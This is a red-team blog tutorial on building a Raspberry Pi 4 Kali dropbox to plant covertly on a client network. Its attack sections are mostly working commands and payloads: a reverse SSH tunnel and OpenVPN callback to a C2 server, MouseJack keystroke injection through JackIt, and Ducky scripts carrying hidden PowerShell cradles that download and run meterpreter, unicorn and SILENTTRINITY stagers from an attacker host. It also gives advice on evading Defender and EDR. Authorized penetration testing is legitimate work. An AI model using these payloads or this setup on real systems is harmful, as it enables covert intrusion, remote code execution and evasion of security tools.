How to Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4

How to Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4

Learn how to setup and connect to your Raspberry Pi 4 drop box using reverse ssh tunnels, OpenVPN, and hostapd. Attack your client’s network, wireless APs, and peripherals using a full Kali instance with wireless attacks, mousejacking attacks, and more.

Author: Jason Zaffuto

Raspberry Pi 4 Model B

Overview

Not long ago, I was scheduled for an upcoming Red Team simulation for an energy company and I started going through all of my gear that I usually bring for the engagement. Aside from my usual tools like shims, lockpicks, and networking gear, I wanted to create a dropbox that I could place on the client’s network that would “phone home” to my attack server, then use tools directly from the dropbox on their network.

Normally, I would use tools such as a LAN Turtle, which is great, but I wanted something that had a full Kali Linux toolset already on it where I could remote in without having to forward traffic through it. I also wanted a device that would connect back to me using multiple methods in case the client’s firewall blocked certain ports outbound. Since Raspberry Pi recently came out with their Raspberry Pi 4, I decided to give it a try. With this type of dropbox, I could walk into a facility in disguise, place the dropbox on their network (preferably on a network switch), then leave the area and have access to their network through an OpenVPN connection and reverse SSH tunnel. I also wanted a backup method incase their egress firewall blocked my outbound traffic so I opted to include a wireless setup for the device. Lastly, I wanted another attack method against employees who used vulnerable wireless mice and keyboards.

Desired Device Requirements

Looking at various options for devices that could be used as dropboxes, I wanted something that was dependable, light, small, fast, and cheap. My desired requirements were the following:

  • Device had to be relatively small in size where I could hide it behind a computer/under a desk, or by a network switch without being noticed.

  • Have the capability to use a persistent reverse SSH tunnel and/or OpenVPN for command and control.

  • Decent storage space (32GB-64GB or more)

  • Fast enough hardware where I could use pentesting tools and not have horrible lag/sluggishness.

  • Cost cheap enough where if it got destroyed or taken by someone, it wouldn’t kill my budget.

  • Option to later add modules for wireless connection and attacks or even a cellular interface for connecting to it via a backchannel.

There are many devices out there like the Hardkernel ODROID-N2, Beaglebone Black, etc but for the price and hardware, I decided to go with the new Raspberry Pi 4.

Hardware Specs

The list of specifications for the Raspberry Pi 4 can be seen below:

Specifications

  • Broadcom BCM2711, Quad core Cortex-A72 (ARM v8) 64-bit SoC @ 1.5GHz

  • 1GB, 2GB or 4GB LPDDR4-2400 SDRAM (depending on model)

  • 2.4 GHz and 5.0 GHz IEEE 802.11ac wireless, Bluetooth 5.0, BLE

  • Gigabit Ethernet

  • 2 USB 3.0 ports; 2 USB 2.0 ports.

  • Raspberry Pi standard 40 pin GPIO header (fully backwards compatible with previous boards)

  • 2 × micro-HDMI ports (up to 4kp60 supported)

  • 2-lane MIPI DSI display port

  • 2-lane MIPI CSI camera port

  • 4-pole stereo audio and composite video port

  • H.265 (4kp60 decode), H264 (1080p60 decode, 1080p30 encode)

  • OpenGL ES 3.0 graphics

  • Micro-SD card slot for loading operating system and data storage

  • 5V DC via USB-C connector (minimum 3A*)

  • 5V DC via GPIO header (minimum 3A*)

  • Power over Ethernet (PoE) enabled (requires separate PoE HAT)

  • Operating temperature: 0 – 50 degrees C ambient

* A good quality 2.5A power supply can be used if downstream USB peripherals consume less than 500mA in total.

For the device, I purchased it from CanaKit and I decided to buy the 4GB Basic Kit which was right at $70. The board by itself would only be $55 but I wanted to get the power adapter, heat sinks, etc.

Hardware Shopping List

Raspberry Pi 4 Model B with 4GB RAM (Basic Kit) - $70

SanDisk 64GB Extreme microSDXC UHS-I Memory Card - $15

Raspberry Pi 4 Case with Fan - $12 (optional)

Wireless WiFi USB Dongle Stick Adapter RT5370 150Mbps - $9 (optional)

Crazyradio PA - $35 (optional)

[Note, you could get the Raspberry Pi 4 Model B with 4GB RAM by itself without extras for $55 if you wanted to go cheaper.]

Operating System

For the operating system, I opted to go with Kali Linux as it already has a lot of great tools on it and is geared for pentesting. You can definitely put something like Debian/Ubuntu on the device and add your own tools if you are worried about specific traffic getting noticed by a blue team member that corresponds with Kali Linux. For my needs and ease of use of this demo, I went ahead and installed Kali. Along with the desktop Kali images, Offsec also provides images for ARM devices which the Raspberry Pi 4 device falls under. Each of those Kali images can be found here.

Kali ARM Images for Raspberry Pi 2,3 and 4

To have the Kali ARM image written to the microSD card, you would use a tool like Win32DiskImager along with 7zip to unzip the .img.xz file. Detailed explanations on the setup with be found below under the “Setup” section.

Wireless

The Raspberry Pi 4 already has a built-in wireless card (2.4 GHz and 5.0 GHz IEEE 802.11ac wireless) with it, and does support packet injection and monitor mode (the Pi 3 didn’t). So you would have the ability to use either the built-in wireless (wlan0) or get another wireless adapter that might have better range if you want to do wireless attacks.

I purchased a wireless adapter that has a RT5370 chipset which also supports monitor mode. This worked perfectly for injecting packets with tools like Aireplay-ng and had decent range. I could connect to one adapter via hostapd and use the other adapter for attacks. (Thank you /u/Loggedinasroot @ reddit for pointing out that the internal wireless has the ability for packet injection/monitor mode)

EASTECH FX-5370TH 802.11bgn 150M Antenna

With the wireless adapter and onboard wireless, I could setup Hostapd to create an access point (walkthrough to setup that up explained later) that would allow me to connect without physically being connected to it. The wireless adapter is optional to have for wireless attacks if you want to go that route as the built-in wireless adapter is really all you need if you just want to connect to the Raspberry Pi 4 over wireless or connect back via OpenVPN/SSH and perform wireless attacks using the built-in wireless.

Crazy PA Wireless Attacks

The Crazy PA is a USB radio dongle based on the nRF24LU1+ from Nordic Semiconductor which operates on a 2.4GHz ISM band radio. This little dongle can be a great attack method against users who use a vulnerable wireless keyboard or mouse by using an attack called “mousejack”. From the mousejack.com website, it states:

MouseJack is a class of vulnerabilities that affects the vast majority of wireless, non-Bluetooth keyboards and mice. These peripherals are 'connected' to a host computer using a radio transceiver, commonly a small USB dongle. Since the connection is wireless, and mouse movements and keystrokes are sent over the air, it is possible to compromise a victim's computer by transmitting specially-crafted radio signals using a device which costs as little as $15.

An attacker can launch the attack from up to 100 meters away. The attacker is able to take control of the target computer, without physically being in front of it, and type arbitrary text or send scripted commands. It is therefore possible to perform rapidly malicious activities without being detected.

The MouseJack exploit centers around injecting unencrypted keystrokes into a target computer. Mouse movements are usually sent unencrypted, and keystrokes are often encrypted (to prevent eavesdropping what is being typed). However the MouseJack vulnerability takes advantage of affected receiver dongles, and their associated software, allowing unencrypted keystrokes transmitted by an attacker to be passed on to the computer's operating system as if the victim had legitimately typed them.

Since our Raspberry Pi device will be planted under a desk or near other users and since we are using a full Kali install, why not have a device that could potentially compromise wireless keyboards and mice?

Case(s)

With the Raspberry Pi 4 basic kit, you already get a few heat sinks that perfectly fits the Raspberry Pi 4 chips but I heard about the Raspberry Pi 4 getting a little hot so I wanted a case with a fan to be safe. The case I found and used was Virlos’ clear transparent case with built-in fan. If you want to go with an all black case you could just spray the case with black spraypaint if the clear case is not for you or get the Raspberry Pi 4 starter package that comes with a black case, then get a shim fan that you can place inside that.

Additionally, you could go with a basic board and shim fan, then hide the Raspberry Pi 4 in a case that looks somewhat inconspicuous such as a power strip.

Raspberry Pi Inside a Power Strip

In the end, it is up to you with how you want to hide your device after getting into a facility. Personally, I like the idea of a case with fan for protection and cooling. I also plan to stick the device under desks or by switches so I use small velcro tabs on one side of the Raspberry Pi 4 case where I can stick it anywhere then take it off easily when I’m done. This allows me to walk into an area and within a few seconds setup the device.


Setup

Now that we have the hardware in hand, let’s go over how we get this all running. We’ll go over the following:

  • Initial Setup of the Kali Image for your MicroSD Card

  • Setup a WiFi Access Point Using Hostapd

  • Setup of Automatic Reverse SSH Tunnel

  • Setup of OpenVPN Client and Server

  • Setup of Crazy PA for Mousejack Attacks

  • Installation of Additional Tools

Initial Setup of the Kali Image for your MicroSD Card

  1. Download the Kali Raspberry Pi 4 image from the Kali downloads site here.

  2. Flash the Kali image to the microSD card that you will use for your Raspberry Pi 4.

    1. For Windows

      1. Use a microSD to USB adapter and connect the microSD card to your Windows system.

      2. On a Windows system, unzip the kali-linux-*-rpi3-nexmon.img.xz file with 7zip or WinRAR.

      3. Use Win32DiskImager to write the Kali image to the microSD card.

    2. For Linux

      1. Use a MicroSD to USB adapter and connect the microSD card to the Linux system.

      2. Use the “dd” tool to image the Kali file to the microSD card. (Note* - make sure to choose the correct storage device here or you risk accidently deleting your computers hard disk. In my example, the device was found under /dev/sdb but yours may be different)

      3. Example command:

        zxcat kali-linux-2019.2a-rpi3-nexmon-img.xz | dd of=/dev/sdb bs=512k
    3. Insert the microSD card into the Raspberry Pi 4 and boot it up using the power supply, an HDMI cable for display, and keyboard/mouse plugged into the USB ports.

    4. Login to the Kali Linux distro with the username of “root” and the password of “toor”.

    5. Plug an Ethernet cable into the Raspberry Pi 4 to provide Internet to the device. The Raspberry Pi 4 should automatically attempt to obtain an IP address via DHCP.

    6. Change the root password. This can be accomplished by opening up a terminal and typing “passwd” then hitting “enter”. Follow the dialog to change the root password:

      passwd
    7. Update and upgrade the Kali distribution:

      apt-get update && apt-get upgrade
    8. Change the hostname of your device:

      nano /etc/hostname [change “kali” to anything you want]
      nano /etc/hosts [change “kali” to anything you want]
    9. Then reboot:

      reboot

Setup a WiFi Access Point Using Hostapd

  1. Install hostapd and pciutils:

    apt-get install hostapd
    apt-get install pciutils
  2. Create a static IP address for the WiFi wlan0:

    nano /etc/network/interfaces
  3. The /etc/network/interfaces file should look like the following:

    auto lo
    iface lo inet loopback
    
    auto eth0
    iface eth0 inet dhcp
    
    auto wlan0
    allow-hotplug wlan0
    iface wlan0 inet static
    address 172.16.66.1
    netmask 255.255.255.0
    gateway 172.16.66.1


  4. Install a DHCP server that will serve WiFi clients:

    apt-get install udhcpd
  5. Edit the udhcpd config file:

    nano /etc/udhcpd.conf
  6. Add the following to the end of the file:

    start           172.16.66.50
    end             172.16.66.70
    interface       wlan0
    
    # Optional
    opt     dns     1.1.1.1
    option  subnet  255.255.255.0
    opt     router  172.16.66.1
    option  domain  local
    
  7. Create a file for udhcpd.leases:

    touch /var/lib/misc/udhcpd.leases
  8. Edit the /etc/default/udhcpd file and change the DHCPD_ENABLED=”no” to “yes”:

    DHCPD_ENABLED=”yes”
  9. Create the file /etc/hostapd/hostapd.conf. This can be accomplished with the “nano” command:

    nano /etc/hostapd/hostapd.conf
  10. Copy the following into the hostapd.conf file. [Modify the SSID and wpa_passphrase accordingly]:

    # Interface configuration
    interface=wlan0
    ssid=iphone10
    channel=6
    
    # WPA Configuration
    macaddr_acl=0
    auth_algs=1
    ignore_broadcast_ssid=0
    wpa=2
    wpa_passphrase=SuperSecretSquirrel
    wpa_key_mgmt=WPA-PSK
    rsn_pairwise=CCMP
    
    #Hardware Configuration
    driver=nl80211
    ieee80211n=1
    hw_mode=g
    wmm_enabled=1

    [NOTE - The above driver=nl80211 has a lower case "L" for "nl" in "nl80211". It is not a "1” (one).]

  11. Modify the file /etc/init.d/hostapd:

    nano /etc/init.d/hostapd
  12. Find the following line:

    DAEMON_CONF=
  13. Change the line to the following:

    DAEMON_CONF=/etc/hostapd/hostapd.conf
  14. Modify the file /etc/default/hostapd:

    nano /etc/default/hostapd
  15. Find the following line:

    DAEMON_CONF=
  16. Change the line to the following:

    DAEMON_CONF="/etc/hostapd/hostapd.conf"
  17. Enable hostapd to start on boot:

    update-rc.d hostapd enable
  18. Now, we need to enable IP forwarding in the kernel so it can forward packets for our client devices to the Internet:

    sysctl -w net.ipv4.ip_forward=1
  19. Delete the comment (#) for the net.ipv4.ip_forward=1 in the /etc/sysctl.conf file:

    nano /etc/sysctl.conf

    [Remove the “#” in front of net.ipv4.ip_forward=1]

  20. Finally, use your IPTables-magic to masquerade client connections to the Internet:

    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  21. There is a nice package available in Kali that will make these changes to IPTables last. Just do this in order to make it happen:

    apt-get install iptables-persistent
    iptables-save > /etc/iptables/rules.v4
  22. To ensure the iptables rules get loaded before the network interface at boot, we will create a short script in the /etc/network/if-pre-up.d/ directory:

    nano /etc/network/if-pre-up.d/iptables
  23. Add the following code to the above /etc/network/if-pre-up.d/iptables file, then save:

    #!/bin/bash
    /usr/sbin/iptables-restore < /etc/iptables/rules.v4
  24. Make the “iptables” file executable:

    chmod +x /etc/network/if-pre-up.d/iptables
  25. Now reboot:

    reboot
  26. You should now see a wireless network named “iphone10” (or whatever named you use) where you can connect to it with your wpa_passphrase you set earlier. You should also have Internet too assuming your Raspberry Pi 4 has Internet. Once connected, you can also SSH into your Raspberry Pi 4.

Setup Automatic Reverse SSH Tunnel

This section assumes you have a command and control server accessible on the Internet and that server has SSH enabled on port 22. For my C2 server, I use Amazon’s Lightsail but you can any cloud service or even a server at your house with port forwarding enabled.

  1. Install “autossh” to use to automatically create an SSH tunnel to a command and control server:

    apt-get install autossh
  2. Generate SSH keys:

    ssh-keygen [Leave all of the settings default]
  3. Copy /root/.ssh/id_rsa.pub to the C2 server:

    scp /root/.ssh/id_rsa.pub root@<C2 IP Address>:/directory/to/upload/to/
  4. Append the contents of id_rsa.pub to ~/.ssh/authorized_keys or create this file on the C2 server:

    [On the C2 server]

    cat /directory/to/upload/to/id_rsa.pub >> ~/.ssh/authorized_keys
  5. Test the key-based authentication. If all goes you should end up logged into the C2 server without the requirement of entering a password.

    [On the RASPBERRY Pi 4]

    ssh root@<C2 IP address>
  6. Test “autossh”:

    autossh -M 11166 -i /root/.ssh/id_rsa -R 6667:localhost:22 root@<C2 IP Address>
  7. If you login to your VPS/C2 server, you should now see port 6667 present after you run a “netstat -antp” command.

  8. To have the autossh start at boot, we will create a cronjob that points to a script. First we will create a bash script for our autossh file:

    nano /bin/autossh-connect.sh
  9. Then we place the autossh command inside the autossh-connect.sh file:

    #!/bin/bash
    autossh -M 11166 -N -f -o “PubkeyAuthentication=yes” -o “PasswordAuthentication=no” -i /root/.ssh/id_rsa -R 6667:localhost:22 root@<Your C2 Server IP> &
  10. Flag meanings:

    1. -N: Do not execute a command on the middleman machine

    2. -f: Drop in the background

    3. &: Execute this command but do not wait for output or an exit code. If this is not added, your machine might hang at boot

  11. For the cronjob creation, type the following command:

    crontab -e
  12. At the bottom of the script (no “#” should be in front of what you are typing), add the following:

    @reboot sleep 5 && /bin/autossh-connect.sh > /dev/null 2>&1
    */5 * * * * /bin/autossh-connect.sh > /dev/null 2>&1

    This tells the cron job after reboot to wait 5 seconds and run the autossh-connect.sh script which will start the autossh process. The 5 seconds was added to ensure the network manager has started first. The “> /dev/null 2>&1” part ensures that no logs are written out to any files as to not take up space. On the second line, the cron job will also try and run every 5 minutes. This is due in case the autossh job gets disconnected or fails for whatever reason.

  13. That’s it. Now when your Raspberry Pi 4 starts, it should autossh to your C2 server which will create a local port of 6667 on the C2 server. When you SSH from your attacker system onto the C2 server, you can run the following command on your C2 server to get access to your Raspberry Pi 4 device:

    ssh localhost -p 6667 [This is ran on the C2 server]

Setup of OpenVPN Client and Server

While we can do a reverse SSH shell to access our Raspberry Pi 4 device, we will also configure the device to use a reverse OpenVPN connection over port 443 (HTTPS). Since the Raspberry Pi 4 will be dropped on the back of a system (or switch) inside an organization, we won't be able to directly connect to it. Therefore, we will have the Raspberry Pi 4 first go outbound via port 443 for VPN back to our OpenVPN AS server. From our attacker Kali box, we will have to also log into the VPN server. Once the Raspberry Pi 4 and attacker machine are VPN'd into our OpenVPN C2 server, we can remote into the Raspberry Pi 4 to scan or exploit systems. This ensures that if the client blocks port 22 outbound for SSH, we have another option to connect over port 443 (HTTPS).

There are three items we need to configure for this setup:

  1. OpenVPN AS server on the Internet.

  2. Raspberry Pi 4 device.

  3. Attacker system.

Setting Up a VPS OpenVPN AS Server
We want to make sure that our VPN server is externally-facing. We will want to host our VPN server on a VPS server as they are extremely easy and quick to setup.

Two providers I like to use are Vultr.com and Amazon Lightsail. This is because these VPS providers are quick, cheap, and super easy to setup. The other reason to pick certain VPS providers is detection of traffic. Most of the time, the victim's network will have a lot of traffic to AWS servers. This would allow you to hide in their traffic.

  1. Go to https://aws.amazon.com/lightsail/ and create a new VPS

    1. Once created, go to Manage -> Networking

    2. Add two Firewall TCP Ports (443 and 943)

  2. Install an OS like Ubuntu. Then make sure to chmod 600 your SSH keys and login to your VPS server from your attacker system:

    ssh -i LightsailDefaultPrivateKey-us-west-2.pem ubuntu@[IP]
  3. After SSHing into the server, go to root:

    sudo su -
  4. Update the server:

    apt-get update && apt-get upgrade
  5. Install OpenVPN AS. Go here to find the latest version:

    1. https://openvpn.net/vpn-software-packages/

  6. Copy the link and download it onto the VPS. Example:

    wget https://openvpn.net/downloads/openvpn-as-latest-ubuntu18.amd_64.deb
  7. Install OpenVPN AS

    dpkg -i openvpn-as-latest-ubuntu18.amd_64.deb
  8. Delete the current profile and configure OpenVPN:

    /usr/local/openvpn_as/bin/ovpn-init
  9. Type DELETE: (case sensitive)

    DELETE
  10. During the setup, a wizard will appear:

    Accept EULA: yes
    Will this be the primary Access Server node: yes
    Please specify the network interface and IP address to be
    used by the Admin Web UI:
    (1) all interfaces: 0.0.0.0
    (2) eth0: 45.77.217.54
    Answer: 1
    Please specify the port number for the Admin Web UI.
    Answer: 943
    Should client traffic be routed by default through the VPN?
    Answer: YES
    Should client DNS traffic be routed by default through the VPN?
    Answer: YES
    Use local authentication via internal DB?
    > Press ENTER for default [no]: 
    Answer: YES
    The rest of these answers should be default. Simply hit the <Enter> key
  11. Change OpenVPN Admin password:

    passwd openvpn supersecretpassword123 [Set your own unique password here]

    [Note - This is a great time to put IPTables for port 943 to only allow connections from your networks.]

Configure OpenVPN AS Server

  1. Go to https://[IP Address of VPS server]:943/admin/

  2. Login with user account "openvpn" and the password you just created

    Note: If you are using AWS Lightsail, go to server network settings and make sure the hostname or IP Address is the right PUBLIC IP address and not the PRIVATE one, then save and update.

  3. In the OpenVPN, verify authentication is set to local:

    Authentication -> General -> Set to Local (On) -> Save Settings -> Update Server
  4. Create Two Users with Allow Auto-Login enabled (I did rasp4 and redteam).

    Go to User Management -> User Permissions

    For each user:

        Set AllowAuto-login
        [Make sure to Set Passwords for both of them]
  5. For the “rasp4” and “redteam” accounts to allow connectivity via VPN, we need to enable some permissions. Make sure to configure / enable user User Permissions:

    All server-side private subnets
    All other VPN clients

Download OpenVPN Profiles

  1. Connect to download profiles

    https://[Your VPS]:943/?src=connect
  2. For each user (rasp4 and redteam) login and download the profile - Yourself (autologin profile)

  3. Save as rasp4.ovpn and redteam.ovpn accordingly

Setting Up the Raspberry Pi 4 and Initial Configuration

  1. Turn on the Raspberry Pi 4 and plug in your ethernet cable

  2. Login to the Raspberry Pi 4 and install OpenVPN:

    apt-get install openvpn
  3. Configure OpenVPN to autostart the .conf files:

    nano /etc/default/openvpn

    [Remove the “#” in front of ‘AUTOSTART=”all”’ then exit and save]

  4. Copy your rasp4.ovpn file to the Raspberry Pi 4:

    scp rasp4.ovpn <Raspberry Pi 4 IP>:/etc/openvpn
  5. From the Raspberry Pi 4, go to the /etc/openvpn directory and change the file name from rasp4.ovpn to client.conf:

    cd /etc/openvpn
    mv rasp4.ovpn client.conf 

    [Note - The client.conf file should directly be in the /etc/openvpn/ directory and not in any subdirectory such as “client/” or “server/”]

  6. Enable OpenVPN to start on boot:

    update-rc.d openvpn enable
  7. Verify OpenVPN starts by rebooting:

    reboot

This should start the OpenVPN client on our Raspberry Pi 4 device. To make sure it works, go back into your OpenVPN AS server and check for connections. Go to "Current Users" under the Status menu and you should see the "Common Name" as "rasp4" with the real address as the external WAN address of where the Raspberry Pi 4 is plugged in and a VPN address.

We now have the Raspberry Pi 4 configured so that any time it connects to a network, it connects back to our VPN Server and we can SSH into the Raspberry Pi 4. For good measure, I would recommend you unplug the Raspberry Pi 4 and plug it back in to test that the OpenVPN auto-connects back to your OpenVPN server.

Accessing the Raspberry Pi 4 from your Attacker System

To access your Raspberry Pi 4 from your attacking system, you would use openvpn from your attacker system with the redteam.ovpn profile you created earlier on the OpenVPN server. From your attacking system, use the following command:

openvpn --config ./redteam.ovpn   

(note - the Raspberry Pi 4 is calling back with the "rasp4.ovpn" user and you will create a connection using the redteam.ovpn user from your attacker box (e.g. Kali attack box on your laptop or desktop))

To SSH into our Raspberry Pi 4 device, we go to the OpenVPN page at the following address:

  • https://[OpenVPN IP]:943/admin/current_users

Go to the “Current Users” section under “Status” and view/copy the “VPN Address” for the “rasp4” user. You would use this address to SSH into the Raspberry Pi 4 device (e.g. ssh 172.27.224.6) from your attacker Kali box (the one where you ran the openvpn —config ./redteam.ovpn from).

OpenVPN Access Server / CUrre

That’s it. Now we can plant the Raspberry Pi 4 on the network and it will auto-VPN back to our OpenVPN server.

Setup of Crazyradio PA for Mousejack Attacks

Once the Crazyradio PA is in hand, the instructions for setting it up with new firmware can be found below:

  1. Plugin your Crazyradio PA to the Raspberry Pi 4.

  2. Run the following commands:

    1. apt-get install sdcc binutils python python-pip
    2. cd /opt && git clone https://github.com/BastilleResearch/mousejack.git
    3. pip install -U pip
    4. pip install -U -I pyusb
    5. pip install -U platformio
    6. git submodule init
    7. git submodule update
    8. cd nrf-research-firmware
    9. make
    10. make install
  3. Afterwards, your Crazyradio PA device should not be flashed. Next run the following:

    1. cd /opt/ && git clone https://github.com/insecurityofthings/jackit.git
    2. cd jackit
    3. pip install -e .
  4. Once your CrazyRadio PA is ready, you can launch JackIt via:

    1. jackit
  5. Without a ducky-style script, the jackit tool will simply scan the area for vulnerable wireless keyboards and mice.

  6. You can find more information on Ducky scripts here.

  7. For this demo, we will go over several types of attacks. One will use Metasploit’s web_delivery module (exploit/multi/script/web_delivery) to deliver and receive shells, another will use unicorn payloads and the last one (one of my favorites) will use SILENTTRINITY for the attack.

Metasploit “web_delivery” Module

Before we begin, let’s create the metasploit database and user for the metasploit database.

  1. We’ll save some time by logging directly into our Raspberry Pi 4 device (using your keyboard, mouse, and monitor plugged into the Raspberry Pi 4).

  2. Now go to “Applications” on the top left corner

  3. Then go to “08 - Exploitation Tools” and click on “metasploit framework”. This will create the database for you and create the database user. (You can also run the command “msfdb init”)

  4. In a terminal on the Raspberry Pi 4, type the following:

    msfconsole
    use multi/script/web_delivery
    set TARGET 2   [This sets the target to PowerShell (PSH)]
    set payload windows/meterpreter/reverse_https
    set LHOST [put your ethernet IP address here]
    set LPORT 443
    set SRVHOST [put your ethernet IP address here]
    set SRVPORT 80
  5. Let’s go ahead and run the module to generate our PowerShell one-liner and start our payload handler:

    exploit -j
  6. Here is an example of the output:

    powershell.exe -nop -w hidden -c $y=new-object net.webclient;$y.proxy=[Net.WebRequest]::GetSystemWebProxy();$y.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $y.downloadstring('http://192.168.0.5/qjVoGRS1de3o6');

  7. Now that we’ve set up our metasploit instance and we have our malicious string in place, we can create a Ducky script. Make sure to save it locally (e.g. ducky-script.txt):

    GUI r
    DELAY 300
    STRING powershell.exe -nop -w hidden -c $y=new-object net.webclient;$y.proxy=[Net.WebRequest]::GetSystemWebProxy();$y.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $y.downloadstring('http://192.168.0.5/qjVoGRS1de3o6');
    DELAY 300
    ENTER
    ENTER
  8. It should be noted that the payload could be cut down to make it shorter. With the JackIt attack, shorter payloads work better. Just know that with shorter less obfuscated payloads, you have more chances of getting hit by host and user-based detections. A shorter payload might look like the following:

    STRING powershell.exe -nop -w hidden -c IEX(new-object net.webclient).downloadstring('http://192.168.0.7/a');

    [Note - you can also use Cobalt Strike and Empire PowerShell one-liners too]

  9. To use JackIt for exploitation vs. reconnaissance, simply call the Duckyscript file with the --script flag:

    jackit --script ducky-script.txt

  10. Now simply pick the target you want to attack and you should get a shell back.

Unicorn Payloads

This attack is very close to the last one but we will use TrustedSec’s unicorn tool to generate the payload.

  1. Let’s download the unicorn tool:

    cd /opt/ && git clone https://github.com/trustedsec/unicorn.git
  2. Next, we will run unicorn.py to view the various attack options

    python unicorn.py
  3. In this scenario, we will chose the PowerShell (PS) attack listed first:

    python unicorn.py windows/meterpreter/reverse_https 192.168.0.5 443
  4. This will take a moment to generate the shellcode…

  5. This will generate two files. A “powershell_attack.txt” file and a “unicorn.rc” file for Metasploit.

  6. First, let’s move the “powershell_attack.txt” file to the /var/www/html/ directory

    mv powershell_attack.txt /var/www/html/hi.txt
  7. Now we will start Apache2 with the following command:

    service apache2 start
  8. Now we will start Metasploit using the unicorn.rc resource file:

    msfconsole -r unicorn.rc
  9. Notice that with the unicorn.rc resource file, all the options and module needed are loaded.

  10. Now we’ll setup a ducky script for the payload:

    nano unicorn_ps.txt
    GUI r
    DELAY 300
    STRING powershell.exe -nop -w hidden -c IEX(new-object net.webclient).downloadstring(‘http://192.168.0.5/hi.txt’);
    ENTER
  11. Start Jackit

    jackit —script unicorn_ps.txt

  12. That’s it. Now we attack a vulnerable device and wait for a reverse shell.

SILENTTRINITY Attack Method

SILENTTRINITY is modern, asynchronous, multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. To view more info about this tool, go here.

Let’s start with installing dependencies:

  1. cd /opt/
  2. git clone https://github.com/SecureAuthCorp/impacket.git
  3. cd impacket
  4. pip install -r requirements.txt
  5. pip install .
    1. If you run into issues with the wrong version of ldap3 try the following:

      1. pip2 install ldap3==2.5.1
      2. pip2 uninstall ldap3==2.5.2
      3. reboot
      4. python setup.py install [You should be good now]

Install SILENTTRINITY:

  1. apt-get install python3.7 python3.7-dev python3-pip
  2. cd /opt/
  3. git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git

Clone the repo and use pipenv to install the dependencies for the Client & Teamserver:

  1. cd /opt/SILENTTRINITY
  2. pip3 install pipenv && pipenv install && pipenv shell

Now run teamserver.py with the following options:

  1. python3 teamserver.py <Your local IP Address> ‘<A random password>’

Open another terminal, go back to /opt/SILENTTRINITY/ and run the following commands:

  1. pipenv shell
  2. python3 st.py
  3. teamservers
  4. connect wss://username:<Your random password>@<Your local IP address>:5000
  5. listeners
  6. use https
  7. start
  8. stagers
  9. list
  10. use powershell
  11. generate https

It should say that it “Generated stager to ./stager.ps1. This “stager.ps1” file will be in /opt/SILENTTRINITY/stager.ps1. Move this file to /var/www/html/ and start apache2:

  1. mv /opt/SILENTTRINITY/stager.ps1 /var/www/html/
  2. service apache2 start

Now you can run the Jackit tool and use this payload against a vulnerable wireless device. This payload when tried recently has bypassed antivirus to include next-gen AV when I ran it in memory and when I used HTTPS instead of HTTP for the download.

GUI r
DELAY 300
STRING powershell.exe -nop -w hidden -c IEX(new-object net.webclient).downloadstring(‘https://<Your IP>/stager.ps1’);
ENTER

After you get your session, the SILENTTRINITY tool has a lot of modules for POST exploitation like mimikatz, enumeration scripts, cmd, winrm, exfil via github, etc.

Also with this tool, I was able to bypass Defender. I’d like to note that downloading stager.ps1 through the browser caused Defender to block the download but was able to bypass Defender by downloading and running the stager in memory. I was able to bypass 3 AV/EDR vendors using this technique; although, at least one EDR system, detected suspicious powershell usage (i.e., powershell downloaded something and ran it). Therefore, if you are able to deliver the stager another way such as say, over smb, you may be able to bypass at least a few AV/EDR. I didn’t cover the msbuild stager during this post, but if you really wanted to bypass AV/EDR, try this type of stager. As long as msbuild.exe is installed on the attack system, you should be good to go (at least for now).

Additional Tools for the Dropbox

Some tools are installed on the dropbox by default such as sqlmap, nmap, wireshark, hydra, john, aircrack-ng and some others but make sure you install whatever tools you like. For example you might add the following:

apt-get install responder macchanger voiphopper snmpcheck onesixtyone patator isr-evilgrade creddump screen crackmapexec
git clone https://github.com/FortyNorthSecurity/EyeWitness.git
git clone https://github.com/SecureAuthCorp/impacket.git

etc etc etc

Conclusion

The Raspberry Pi 4 dropbox worked perfectly for my red team engagement where I ended up placing the device behind a printer closest to the customer’s parking lot (easier to reach wireless just in case). The device connected back over both OpenVPN (port 443) and SSH using autossh (port 22) and both connections were solid. I was able to handle multiple meterpreter shells with ease and I found that the device and commands ran on it were surprisingly fast. I also found that I was able to exploit several wireless keyboards and a wireless mouse with the Jackit tool. I also found that the device was just as good as me having a laptop on their network running the same tools. The only thing I didn’t try was password hash cracking on the device as I have my own offline system dedicated for that but I think it would handle some light cracking.


IMPORTANT

With any red teaming / pentesting or running tools mentioned above, it is imperative that you ALWAYS have permission beforehand. The information provided is meant solely for educational purposes and for legal/authorized use.

Author: Jason Zaffuto